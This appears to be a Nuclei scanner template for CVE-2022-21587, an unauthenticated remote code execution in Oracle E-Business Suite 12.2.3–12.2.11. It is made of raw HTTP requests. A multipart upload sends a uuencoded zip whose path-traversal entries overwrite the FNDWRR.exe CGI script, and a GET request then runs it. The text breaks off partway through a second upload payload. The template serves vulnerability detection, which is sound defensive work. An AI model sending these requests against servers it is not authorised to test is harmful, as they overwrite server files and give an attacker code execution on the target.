id: CVE-2022-21587 info: name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. remediation: | Apply the necessary security patches provided by Oracle to mitigate this vulnerability. reference: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21587 - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-21587 cwe-id: CWE-306 epss-score: 0.96505 epss-percentile: 0.99484 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle product: e-business_suite tags: cve,intrusive,ebs,unauth,kev,cve2022,rce,oast,oracle,packetstorm http: - raw: - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9. M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R M,BTR,34X-R(["G!R:6YT('-Y@```$,``````````````+2!`````"XN+RXN M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO&M&3D174E(N<&Q02P4&``````$``0!Q````VP`````` ` end ------WebKitFormBoundaryZsMro0UsAQYLDZGv-- - | GET /OA_CGI/FNDWRR.exe HTTP/1.1 Host: {{Hostname}} - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M